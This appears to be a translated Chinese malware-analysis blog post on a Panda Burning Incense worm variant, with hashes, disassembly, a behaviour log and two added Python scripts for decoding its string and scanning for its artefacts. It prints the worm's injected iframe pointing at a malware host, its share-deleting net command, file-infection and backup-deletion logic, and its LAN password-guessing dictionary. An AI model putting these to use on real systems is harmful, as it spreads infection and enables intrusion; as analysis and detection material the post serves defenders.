A new Panda (熊猫) variant with a few changes; it carries the Coral QQ (珊瑚QQ) icon.
Sample from Jianmeng (剑盟).
Still a bundling infector. There are plenty of analyses online, so I won't go into much detail....
Additional Information
File size: 68586 bytes
CRC32 : 3392675E
RIPEMD160: 4A96E015A2D146E66B75C4A8EC00D9820193B350
Tiger_192: 21153AB25BDA43D28B411D292A09C2B9AB66BEA35CDAFA9D
MD5: 10865d0b094832d33a1cb4a4c8407ed0
SHA1: 45ca9813ba02906636cb1bad00aadc2c53482ff5
Packer: FSG 2.0 -> bart/xt
Compiler: Borland Delphi 6.0 - 7.0
Looking at the disassembly, it is much like the earlier Panda; nothing special apart from a change to the icon resource:
004191CA . 8B95 0CFBFFFF mov edx, dword ptr [ebp>
004191D0 . 8D45 EC lea eax, dword ptr [ebp>
004191D3 . B9 D0944100 mov ecx, 004194D0 \\ fetches the icon resource here
004191D8 . E8 63B4FEFF call 00404640
004191DD . B2 01 mov dl, 1
004191DF . A1 D4444100 mov eax, dword ptr [414>
004191E4 . E8 8FD3FFFF call 00416578
004191E9 . 8945 E8 mov dword ptr [ebp-18],>
004191EC . 33C0 xor eax, eax
004191EE . 55 push ebp
004191EF . 68 4F924100 push 0041924F
004191F4 . 64:FF30 push dword ptr fs:[eax]
004191F7 . 64:8920 mov dword ptr fs:[eax],>
004191FA . 6A 00 push 0 ; /IconIndex = 0
004191FC . 53 push ebx ; |FileName
004191FD . A1 60064200 mov eax, dword ptr [420>; |
00419202 . 50 push eax ; |hInst => NULL
00419203 . E8 B0DFFEFF call 004071B8 ; \ExtractIconA
Fetches the icon resource and copies it to %temp%; Panda Burning Incense (熊猫烧香) apparently didn't do this?
Then it kills AV software and shares, bundles itself into files, brute-forces LAN passwords from a dictionary, and finally deletes .GHO files.
Haha, the icon of the bundled file goes blurry (16-bit infection?), its attributes are set to hidden, and it shows up as FSG-packed.
After running, it creates a file with a doubled extension in the same directory, e.g. Filename.exe.exe
The original program no longer runs; the double-extension one does. It also creates Desktop_.ini in every folder as that day's infection marker.
Not sure whether the dedicated removal tool can kill it, heh.
SSM log:
Parent process:
Path: C:\Documents and Settings\admin\桌面\setup.exe
PID: 596
Child process:
Path: C:\WINNT\system32\drivers\nvscv32.exe
Command line:C:\winnt\system32\drivers\nvscv32.exe
\\ drops the virus file
Process:
Path: C:\WINNT\system32\drivers\nvscv32.exe
PID: 1660
Registry Group: User AutoRun
Object:
Registry key: HKCU\SOFTWARE\MICROSOFT\Windows\CURRENTVERSION\Run
Registry value: nvscv32
Type: REG_SZ
Value: C:\winnt\system32\drivers\nvscv32.exe
\\ writes the registry
Process:
Path: C:\WINNT\system32\drivers\nvscv32.exe
PID: 1660
Network information:
IP address: 192.168.0.53
Trusted zone: No
Protocol: TCP
\\ accesses the LAN
Parent process:
Path: C:\WINNT\system32\CMD.EXE
PID: 2088
Information: Windows NT Command Processor (Microsoft Corporation)
Child process:
Path: C:\WINNT\system32\net.exe
Information: Net Command (Microsoft Corporation)
Command line:net share D$ /del /y
\\ deletes the share (avoids re-infection)
Some disassembly:
00401546 |. C743 04 00001>mov dword ptr [ebx+4], >
0040154D |. 6A 04 push 4 ; /Protect = PAGE_READWRITE
0040154F |. 68 00200000 push 2000 ; |AllocationType = MEM_RESERVE
00401554 |. 68 00001000 push 100000 ; |Size = 100000 (1048576.)
00401559 |. 55 push ebp ; |Address
0040155A |. E8 A5FDFFFF call <jmp.&kernel32.Virt>; \VirtualAlloc
\\ compares the file size; skips files larger than 10 MB
0041AFB9 . 8B85 90FDFFFF mov eax, dword ptr [ebp>
0041AFBF . BA 68B74100 mov edx, 0041B768 ; "GHO"
0041AFC4 . E8 7797FEFF call 00404740
0041AFC9 . 75 25 jnz short 0041AFF0
0041AFCB . 8D85 88FDFFFF lea eax, dword ptr [ebp>
0041AFD1 . 8B8D A8FEFFFF mov ecx, dword ptr [ebp>
0041AFD7 . 8B55 FC mov edx, dword ptr [ebp>
0041AFDA . E8 6196FEFF call 00404640
0041AFDF . 8B85 88FDFFFF mov eax, dword ptr [ebp>
0041AFE5 . E8 0A98FEFF call 004047F4
0041AFEA . 50 push eax ; /FileName
0041AFEB . E8 F0B1FEFF call <jmp.&kernel32.Dele>; \DeleteFileA
\\ deletes the image (.GHO) file
0041B24F . 8D95 28FDFFFF lea edx, dword ptr [ebp>
0041B255 . B8 D0B74100 mov eax, 0041B7D0 ; ASCII "htm"
0041B25A . E8 E9B8FEFF call 00406B48
0041B25F . 8B95 28FDFFFF mov edx, dword ptr [ebp>
0041B265 . 58 pop eax
0041B266 . E8 D594FEFF call 00404740
0041B26B . 75 1F jnz short 0041B28C
0041B26D . 8D85 24FDFFFF lea eax, dword ptr [ebp>
0041B273 . 8B8D A8FEFFFF mov ecx, dword ptr [ebp>
0041B279 . 8B55 FC mov edx, dword ptr [ebp>
0041B27C . E8 BF93FEFF call 00404640
0041B281 . 8B85 24FDFFFF mov eax, dword ptr [ebp>
0041B287 . E8 1CD7FFFF call 004189A8
0041B28C > 8D95 1CFDFFFF lea edx, dword ptr [ebp>
0041B292 . 8B85 A8FEFFFF mov eax, dword ptr [ebp>
0041B298 . E8 D7B9FEFF call 00406C74
0041B29D . 8B85 1CFDFFFF mov eax, dword ptr [ebp>
0041B2A3 . 8D95 20FDFFFF lea edx, dword ptr [ebp>
0041B2A9 . E8 9AB8FEFF call 00406B48
0041B2AE . 8B85 20FDFFFF mov eax, dword ptr [ebp>
0041B2B4 . 50 push eax
0041B2B5 . 8D95 18FDFFFF lea edx, dword ptr [ebp>
0041B2BB . B8 DCB74100 mov eax, 0041B7DC ; ASCII "html"
0041B2C0 . E8 83B8FEFF call 00406B48
0041B2C5 . 8B95 18FDFFFF mov edx, dword ptr [ebp>
0041B2CB . 58 pop eax
0041B2CC . E8 6F94FEFF call 00404740
0041B2D1 . 75 1F jnz short 0041B2F2
0041B2D3 . 8D85 14FDFFFF lea eax, dword ptr [ebp>
0041B2D9 . 8B8D A8FEFFFF mov ecx, dword ptr [ebp>
0041B2DF . 8B55 FC mov edx, dword ptr [ebp>
0041B2E2 . E8 5993FEFF call 00404640
0041B2E7 . 8B85 14FDFFFF mov eax, dword ptr [ebp>
0041B2ED . E8 B6D6FFFF call 004189A8
0041B2F2 > 8D95 0CFDFFFF lea edx, dword ptr [ebp>
0041B2F8 . 8B85 A8FEFFFF mov eax, dword ptr [ebp>
0041B2FE . E8 71B9FEFF call 00406C74
0041B303 . 8B85 0CFDFFFF mov eax, dword ptr [ebp>
0041B309 . 8D95 10FDFFFF lea edx, dword ptr [ebp>
0041B30F . E8 34B8FEFF call 00406B48
0041B314 . 8B85 10FDFFFF mov eax, dword ptr [ebp>
0041B31A . 50 push eax
0041B31B . 8D95 08FDFFFF lea edx, dword ptr [ebp>
0041B321 . B8 ECB74100 mov eax, 0041B7EC ; ASCII "asp"
0041B326 . E8 1DB8FEFF call 00406B48
0041B32B . 8B95 08FDFFFF mov edx, dword ptr [ebp>
0041B331 . 58 pop eax
0041B332 . E8 0994FEFF call 00404740
0041B337 . 75 1F jnz short 0041B358
0041B339 . 8D85 04FDFFFF lea eax, dword ptr [ebp>
0041B33F . 8B8D A8FEFFFF mov ecx, dword ptr [ebp>
0041B345 . 8B55 FC mov edx, dword ptr [ebp>
0041B348 . E8 F392FEFF call 00404640
0041B34D . 8B85 04FDFFFF mov eax, dword ptr [ebp>
0041B353 . E8 50D6FFFF call 004189A8
0041B358 > 8D95 FCFCFFFF lea edx, dword ptr [ebp>
0041B35E . 8B85 A8FEFFFF mov eax, dword ptr [ebp>
0041B364 . E8 0BB9FEFF call 00406C74
0041B369 . 8B85 FCFCFFFF mov eax, dword ptr [ebp>
0041B36F . 8D95 00FDFFFF lea edx, dword ptr [ebp>
0041B375 . E8 CEB7FEFF call 00406B48
0041B37A . 8B85 00FDFFFF mov eax, dword ptr [ebp>
0041B380 . 50 push eax
0041B381 . 8D95 F8FCFFFF lea edx, dword ptr [ebp>
0041B387 . B8 F8B74100 mov eax, 0041B7F8 ; ASCII "php"
0041B38C . E8 B7B7FEFF call 00406B48
0041B391 . 8B95 F8FCFFFF mov edx, dword ptr [ebp>
0041B397 . 58 pop eax
0041B398 . E8 A393FEFF call 00404740
0041B39D . 75 1F jnz short 0041B3BE
0041B39F . 8D85 F4FCFFFF lea eax, dword ptr [ebp>
0041B3A5 . 8B8D A8FEFFFF mov ecx, dword ptr [ebp>
0041B3AB . 8B55 FC mov edx, dword ptr [ebp>
0041B3AE . E8 8D92FEFF call 00404640
0041B3B3 . 8B85 F4FCFFFF mov eax, dword ptr [ebp>
0041B3B9 . E8 EAD5FFFF call 004189A8
0041B3BE > 8D95 ECFCFFFF lea edx, dword ptr [ebp>
0041B3C4 . 8B85 A8FEFFFF mov eax, dword ptr [ebp>
0041B3CA . E8 A5B8FEFF call 00406C74
0041B3CF . 8B85 ECFCFFFF mov eax, dword ptr [ebp>
0041B3D5 . 8D95 F0FCFFFF lea edx, dword ptr [ebp>
0041B3DB . E8 68B7FEFF call 00406B48
0041B3E0 . 8B85 F0FCFFFF mov eax, dword ptr [ebp>
0041B3E6 . 50 push eax
0041B3E7 . 8D95 E8FCFFFF lea edx, dword ptr [ebp>
0041B3ED . B8 04B84100 mov eax, 0041B804 ; ASCII "jsp"
0041B3F2 . E8 51B7FEFF call 00406B48
0041B3F7 . 8B95 E8FCFFFF mov edx, dword ptr [ebp>
0041B3FD . 58 pop eax
0041B3FE . E8 3D93FEFF call 00404740
0041B403 . 75 1F jnz short 0041B424
0041B405 . 8D85 E4FCFFFF lea eax, dword ptr [ebp>
0041B40B . 8B8D A8FEFFFF mov ecx, dword ptr [ebp>
0041B411 . 8B55 FC mov edx, dword ptr [ebp>
0041B414 . E8 2792FEFF call 00404640
0041B419 . 8B85 E4FCFFFF mov eax, dword ptr [ebp>
0041B41F . E8 84D5FFFF call 004189A8
0041B424 > 8D95 DCFCFFFF lea edx, dword ptr [ebp>
0041B42A . 8B85 A8FEFFFF mov eax, dword ptr [ebp>
0041B430 . E8 3FB8FEFF call 00406C74
0041B435 . 8B85 DCFCFFFF mov eax, dword ptr [ebp>
0041B43B . 8D95 E0FCFFFF lea edx, dword ptr [ebp>
0041B441 . E8 02B7FEFF call 00406B48
0041B446 . 8B85 E0FCFFFF mov eax, dword ptr [ebp>
0041B44C . 50 push eax
0041B44D . 8D95 D8FCFFFF lea edx, dword ptr [ebp>
0041B453 . B8 10B84100 mov eax, 0041B810 ; ASCII "aspx"
0041B458 . E8 EBB6FEFF call 00406B48
0041B45D . 8B95 D8FCFFFF mov edx, dword ptr [ebp>
0041B463 . 58 pop eax
0041B464 . E8 D792FEFF call 00404740
0041B469 . 75 1F jnz short 0041B48A
0041B46B . 8D85 D4FCFFFF lea eax, dword ptr [ebp>
0041B471 . 8B8D A8FEFFFF mov ecx, dword ptr [ebp>
0041B477 . 8B55 FC mov edx, dword ptr [ebp>
0041B47A . E8 C191FEFF call 00404640
0041B47F . 8B85 D4FCFFFF mov eax, dword ptr [ebp>
\\ looks for web page files and injects code
004189D8 . 8D4D F8 lea ecx, dword ptr [ebp>
004189DB . BA D08A4100 mov edx, 00418AD0 ; ASCII "Search"
004189E0 . B8 E08A4100 mov eax, 00418AE0 ; ASCII
"=nb{end'w{g>ispy>,.ps~*hsqo{*`nj+~kql)l}i#vn`}l>#7&)lfh`l}9!1%:5+jgueda="
\\ the injected code, which decrypts to:
<iframe src=http://www.krvkr.com/worm.htm width="0" height="0"></iframe>
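The post gives the encoded constant at 00418AE0 and its decrypted form, but not the routine. As an added example (my code, not the post's or the sample's), the script below recovers the key from that known-plaintext pair and decodes with it: the byte-wise XOR of the two strings repeats with period 6, so a repeating 6-byte XOR key is enough to explain the pair. Whether the sample's routine around 004189D8 really works that way, or derives the key from something else, is an assumption the listing does not settle.

```python
from __future__ import annotations

# Added example, not code from the original post: known-plaintext recovery of a
# repeating XOR key, then decoding with it. The key this finds is inferred from
# the pair below; it is an assumption that the sample uses this scheme.
from itertools import cycle

# The two strings exactly as the post gives them: the encoded constant and the
# <iframe> tag the author reports as its decryption.
ENCODED = "=nb{end'w{g>ispy>,.ps~*hsqo{*`nj+~kql)l}i#vn`}l>#7&)lfh`l}9!1%:5+jgueda="
DECODED = '<iframe src=http://www.krvkr.com/worm.htm width="0" height="0"></iframe>'


def recover_xor_key(ct: bytes, pt: bytes, max_len: int = 32) -> bytes:
    """Return the shortest repeating XOR key (length <= max_len) mapping ct to pt.

    ct XOR pt is the key stream itself; the key is the shortest prefix of that
    stream which repeats cleanly over the whole length.
    Raises ValueError when no periodic key up to max_len fits.
    """
    if len(ct) != len(pt):
        raise ValueError("ciphertext and plaintext lengths differ")
    stream = bytes(c ^ p for c, p in zip(ct, pt))
    for n in range(1, min(max_len, len(stream)) + 1):
        if all(stream[i] == stream[i % n] for i in range(len(stream))):
            return stream[:n]
    raise ValueError("no repeating key of length <= %d fits" % max_len)


def xor_decode(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (symmetric: also encodes)."""
    return bytes(c ^ k for c, k in zip(data, cycle(key)))


def decode_iframe() -> tuple[bytes, str]:
    """Recover the key from the sample's pair and decode the constant with it."""
    ct = ENCODED.encode("latin-1")
    key = recover_xor_key(ct, DECODED.encode("latin-1"))
    return key, xor_decode(ct, key).decode("latin-1")


if __name__ == "__main__":
    key, plain = decode_iframe()
    print("recovered key:", key.hex())
    print(plain)
```

The recovered key is the byte sequence 01 07 04 09 04 03; with it, any other string the sample encodes the same way can be decoded by calling xor_decode on its bytes.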
0041A73E > 8D85 88FEFFFF lea eax, dword ptr [ebp>
0041A744 . B9 48B54100 mov ecx, 0041B548 ; ASCII "*.*"
0041A749 . 8B55 FC mov edx, dword ptr [ebp>
0041A74C . E8 EF9EFEFF call 00404640
0041A751 . 8B85 88FEFFFF mov eax, dword ptr [ebp>
0041A757 . 8D8D 9CFEFFFF lea ecx, dword ptr [ebp>
0041A75D . BA 3F000000 mov edx, 3F
0041A762 . E8 A5DDFFFF call 0041850C
0041A767 . 85C0 test eax, eax
0041A769 . 0F85 350D0000 jnz 0041B4A4
0041A76F > 8B85 A4FEFFFF mov eax, dword ptr [ebp>
0041A775 . 83E0 10 and eax, 10
0041A778 . 83F8 10 cmp eax, 10
0041A77B . 0F85 07080000 jnz 0041AF88
0041A781 . 8B85 A8FEFFFF mov eax, dword ptr [ebp>
0041A787 . 8038 2E cmp byte ptr [eax], 2E
0041A78A . 0F84 F8070000 je 0041AF88
0041A790 . 8D95 84FEFFFF lea edx, dword ptr [ebp>
0041A796 . B8 54B54100 mov eax, 0041B554 ; ASCII "WINDOWS"
0041A79B . E8 A8C3FEFF call 00406B48
0041A7A0 . 8B85 84FEFFFF mov eax, dword ptr [ebp>
0041A7A6 . 50 push eax
0041A7A7 . 8D95 80FEFFFF lea edx, dword ptr [ebp>
0041A7AD . 8B85 A8FEFFFF mov eax, dword ptr [ebp>
0041A7B3 . E8 90C3FEFF call 00406B48
0041A7B8 . 8B95 80FEFFFF mov edx, dword ptr [ebp>
0041A7BE . 58 pop eax
0041A7BF . E8 7C9FFEFF call 00404740
0041A7C4 . 0F84 C70C0000 je 0041B491
0041A7CA . 8D95 7CFEFFFF lea edx, dword ptr [ebp>
........ (omitted)
\\ traverses files on every partition, skipping NTDETECT.COM\QQ.exe\Setup.exe\nvscv32.exe and System Restore, the Recycle Bin, etc.
0041F6C0 C0BB4100 dd setup(已.0041BBC0 ; ASCII "\Documents and Settings\All Users\Start Menu\Programs\Startup\"
0041F6C4 08BC4100 dd setup(已.0041BC08
0041F6C8 4CBC4100 dd setup(已.0041BC4C ; ASCII "\WINDOWS\Start Menu\Programs\Startup\"
0041F6CC 7CBC4100 dd setup(已.0041BC7C ; ASCII "\WINNT\Profiles\All Users\Start Menu\Programs\Startup\"
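Turning the behaviour described above into a check a responder can run: as an added example (not the post's or the worm's code), the scanner below walks a directory tree for the three host artefacts the post names, the Desktop_.ini marker dropped in visited folders, a Filename.exe.exe companion sitting next to Filename.exe, and the decoded iframe inside files with the six web extensions the injection loop compares against. The sample tree it builds for itself is constructed test data, and matching on the krvkr.com/worm.htm host rather than the exact tag is my choice, so a variant with different width/height attributes is still caught.

```python
# Added example, not code from the original post: scan a tree for the
# artefacts this variant leaves behind. Fixture data below is constructed.
import os
import re
import sys
import tempfile
from pathlib import Path

# Extensions the injection loop above compares against.
WEB_EXTS = {".htm", ".html", ".asp", ".php", ".jsp", ".aspx"}
# Marker file the worm drops in every folder it visits (per the post).
MARKER = "Desktop_.ini"
# The injected tag as decoded above, matched on the host/path rather than
# the exact attribute string (my choice, to survive trivial variation).
IFRAME_RE = re.compile(rb"<iframe[^>]*krvkr\.com/worm\.htm[^>]*>", re.IGNORECASE)


def scan_tree(root):
    """Walk root and return a list of (indicator, path) tuples."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        names = set(filenames)
        for name in filenames:
            path = Path(dirpath) / name
            if name == MARKER:
                hits.append(("marker", str(path)))
                continue
            low = name.lower()
            # Filename.exe.exe next to Filename.exe: the bundled companion.
            if low.endswith(".exe.exe") and name[:-4] in names:
                hits.append(("companion", str(path)))
                continue
            if Path(low).suffix in WEB_EXTS:
                try:
                    data = path.read_bytes()
                except OSError:
                    continue
                if IFRAME_RE.search(data):
                    hits.append(("iframe", str(path)))
    return hits


def build_fixture(root):
    """Create a small constructed tree: one clean site file, one injected one,
    a marker, and an .exe with its .exe.exe companion."""
    root = Path(root)
    site = root / "site"
    site.mkdir()
    (site / "index.htm").write_bytes(b"<html><body>hello</body></html>\n")
    (site / "about.html").write_bytes(
        b"<html><body>about</body></html>\n"
        b'<iframe src=http://www.krvkr.com/worm.htm width="0" height="0"></iframe>'
    )
    (site / MARKER).write_bytes(b"constructed marker")
    tools = root / "tools"
    tools.mkdir()
    (tools / "Filename.exe").write_bytes(b"MZ")
    (tools / "Filename.exe.exe").write_bytes(b"MZ")
    (tools / "readme.txt").write_bytes(b"clean")


def demo():
    """Scan the constructed fixture and return the sorted indicator kinds found."""
    with tempfile.TemporaryDirectory() as tmp:
        build_fixture(tmp)
        hits = scan_tree(tmp)
    return sorted(kind for kind, _ in hits)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "."
    for kind, path in scan_tree(target):
        print(kind, path)
```

Run it against a share or a mounted disk image (python scan.py D:\); on the constructed fixture it reports one marker, one companion and one injected page, and the clean index.htm and readme.txt produce nothing.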
0041F6D0 00 db 00
0041F6D1 00 db 00
0041F6D2 00 db 00
0041F6D3 00 db 00
0041F6D4 14C14100 dd setup(已.0041C114 ; ASCII "1234"
0041F6D8 24C14100 dd setup(已.0041C124 ; ASCII "password"
0041F6DC 38C14100 dd setup(已.0041C138 ; ASCII "6969"
0041F6E0 48C14100 dd setup(已.0041C148 ; ASCII "harley"
0041F6E4 58C14100 dd setup(已.0041C158 ; ASCII "123456"
0041F6E8 68C14100 dd setup(已.0041C168 ; ASCII "golf"
0041F6EC 78C14100 dd setup(已.0041C178 ; ASCII "pussy"
0041F6F0 88C14100 dd setup(已.0041C188 ; ASCII "mustang"
0041F6F4 98C14100 dd setup(已.0041C198 ; ASCII "1111"
0041F6F8 A8C14100 dd setup(已.0041C1A8 ; ASCII "shadow"
0041F6FC B8C14100 dd setup(已.0041C1B8 ; ASCII "1313"
0041F700 C8C14100 dd setup(已.0041C1C8 ; ASCII "fish"
0041F704 D8C14100 dd setup(已.0041C1D8 ; ASCII "5150"
0041F708 E8C14100 dd setup(已.0041C1E8 ; ASCII "7777"
0041F70C F8C14100 dd setup(已.0041C1F8 ; ASCII "qwerty"
0041F710 08C24100 dd setup(已.0041C208 ; ASCII "baseball"
0041F714 1CC24100 dd setup(已.0041C21C ; ASCII "2112"
0041F718 2CC24100 dd setup(已.0041C22C ; ASCII "letmein"
0041F71C 3CC24100 dd setup(已.0041C23C ; ASCII "12345678"
0041F720 50C24100 dd setup(已.0041C250 ; ASCII "12345"
0041F724 60C24100 dd setup(已.0041C260 ; ASCII "ccc"
0041F728 6CC24100 dd setup(已.0041C26C ; ASCII "admin"
0041F72C 7CC24100 dd setup(已.0041C27C ; ASCII "5201314"
0041F730 8CC24100 dd setup(已.0041C28C ; ASCII "qq520"
0041F734 9CC24100 dd setup(已.0041C29C
0041F738 A8C24100 dd setup(已.0041C2A8 ; ASCII "12"
0041F73C B4C24100 dd setup(已.0041C2B4 ; ASCII "123"
0041F740 C0C24100 dd setup(已.0041C2C0 ; ASCII "1234567"
0041F744 D0C24100 dd setup(已.0041C2D0 ; ASCII "123456789"
0041F748 E4C24100 dd setup(已.0041C2E4 ; ASCII "654321"
0041F74C F4C24100 dd setup(已.0041C2F4 ; ASCII "54321"
0041F750 04C34100 dd setup(已.0041C304 ; ASCII "111"
0041F754 10C34100 dd setup(已.0041C310 ; ASCII "000000"
0041F758 20C34100 dd setup(已.0041C320 ; ASCII "abc"
0041F75C 2CC34100 dd setup(已.0041C32C ; ASCII "pw"
0041F760 38C34100 dd setup(已.0041C338 ; ASCII "11111111"
0041F764 4CC34100 dd setup(已.0041C34C ; ASCII "88888888"
0041F768 60C34100 dd setup(已.0041C360 ; ASCII "pass"
0041F76C 70C34100 dd setup(已.0041C370 ; ASCII "passwd"
0041F770 80C34100 dd setup(已.0041C380 ; ASCII "database"
0041F774 94C34100 dd setup(已.0041C394 ; ASCII "abcd"
0041F778 A4C34100 dd setup(已.0041C3A4 ; ASCII "abc123"
0041F77C 60C34100 dd setup(已.0041C360 ; ASCII "pass"
0041F780 B4C34100 dd setup(已.0041C3B4 ; ASCII "sybase"
0041F784 C4C34100 dd setup(已.0041C3C4 ; ASCII "123qwe"
0041F788 D4C34100 dd setup(已.0041C3D4 ; ASCII "server"
0041F78C E4C34100 dd setup(已.0041C3E4 ; ASCII "computer"
0041F790 F8C34100 dd setup(已.0041C3F8 ; ASCII "520"
0041F794 04C44100 dd setup(已.0041C404 ; ASCII "super"
0041F798 14C44100 dd setup(已.0041C414 ; ASCII "123asd"
0041F79C 24C44100 dd setup(已.0041C424
0041F7A0 30C44100 dd setup(已.0041C430 ; ASCII "ihavenopass"
0041F7A4 44C44100 dd setup(已.0041C444 ; ASCII "godblessyou"
0041F7A8 58C44100 dd setup(已.0041C458 ; ASCII "enable"
0041F7AC 68C44100 dd setup(已.0041C468 ; ASCII "xp"
0041F7B0 74C44100 dd setup(已.0041C474 ; ASCII "2002"
0041F7B4 84C44100 dd setup(已.0041C484 ; ASCII "2003"
0041F7B8 94C44100 dd setup(已.0041C494 ; ASCII "2600"
0041F7BC A4C44100 dd setup(已.0041C4A4 ; ASCII "alpha"
0041F7C0 B4C44100 dd setup(已.0041C4B4 ; ASCII "110"
0041F7C4 C0C44100 dd setup(已.0041C4C0 ; ASCII "111111"
0041F7C8 D0C44100 dd setup(已.0041C4D0 ; ASCII "121212"
0041F7CC E0C44100 dd setup(已.0041C4E0 ; ASCII "123123"
0041F7D0 F0C44100 dd setup(已.0041C4F0 ; ASCII "1234qwer"
0041F7D4 04C54100 dd setup(已.0041C504 ; ASCII "123abc"
0041F7D8 14C54100 dd setup(已.0041C514 ; ASCII "007"
0041F7DC 20C54100 dd setup(已.0041C520
0041F7E0 2CC54100 dd setup(已.0041C52C ; ASCII "aaa"
0041F7E4 38C54100 dd setup(已.0041C538 ; ASCII "patrick"
0041F7E8 48C54100 dd setup(已.0041C548 ; ASCII "pat"
0041F7EC 54C54100 dd setup(已.0041C554 ; ASCII "administrator"
0041F7F0 6CC54100 dd setup(已.0041C56C ; ASCII "root"
0041F7F4 7CC54100 dd setup(已.0041C57C ; ASCII "sex"
0041F7F8 88C54100 dd setup(已.0041C588 ; ASCII "god"
0041F7FC 94C54100 dd setup(已.0041C594 ; ASCII "fuckyou"
0041F800 A4C54100 dd setup(已.0041C5A4 ; ASCII "fuck"
0041F804 20C34100 dd setup(已.0041C320 ; ASCII "abc"
0041F808 B4C54100 dd setup(已.0041C5B4 ; ASCII "test"
0041F80C C4C54100 dd setup(已.0041C5C4 ; ASCII "test123"
0041F810 D4C54100 dd setup(已.0041C5D4 ; ASCII "temp"
0041F814 E4C54100 dd setup(已.0041C5E4 ; ASCII "temp123"
0041F818 F4C54100 dd setup(已.0041C5F4 ; ASCII "win"
0041F81C 00C64100 dd setup(已.0041C600 ; ASCII "pc"
0041F820 0CC64100 dd setup(已.0041C60C ; ASCII "asdf"
0041F824 1CC64100 dd setup(已.0041C61C ; ASCII "pwd"
0041F828 28C64100 dd setup(已.0041C628 ; ASCII "qwer"
0041F82C 38C64100 dd setup(已.0041C638 ; ASCII "yxcv"
0041F830 48C64100 dd setup(已.0041C648 ; ASCII "zxcv"
0041F834 58C64100 dd setup(已.0041C658 ; ASCII "home"
0041F838 68C64100 dd setup(已.0041C668 ; ASCII "xxx"
0041F83C 74C64100 dd setup(已.0041C674 ; ASCII "owner"
0041F840 84C64100 dd setup(已.0041C684 ; ASCII "login"
0041F844 94C64100 dd setup(已.0041C694 ; ASCII "Login"
0041F848 A4C64100 dd setup(已.0041C6A4 ; ASCII "pw123"
0041F84C B4C64100 dd setup(已.0041C6B4 ; ASCII "love"
0041F850 C4C64100 dd setup(已.0041C6C4 ; ASCII "mypc"
0041F854 D4C64100 dd setup(已.0041C6D4 ; ASCII "mypc123"
0041F858 E4C64100 dd setup(已.0041C6E4 ; ASCII "admin123"
0041F85C F8C64100 dd setup(已.0041C6F8 ; ASCII "mypass"
0041F860 08C74100 dd setup(已.0041C708 ; ASCII "mypass123"
0041F864 1CC74100 dd setup(已.0041C71C ; ASCII "901100"
0041F868 2CC74100 dd setup(已.0041C72C ; ASCII "Administrator"
0041F86C 44C74100 dd setup(已.0041C744 ; ASCII "Guest"
0041F870 54C74100 dd setup(已.0041C754 ; ASCII "admin"
0041F874 64C74100 dd setup(已.0041C764 ; ASCII "Root"
\\ enumerates LAN shared directories and brute-forces their passwords with the dictionary above
There are also some startup-item deletions/writes that I won't paste.
Some screenshots: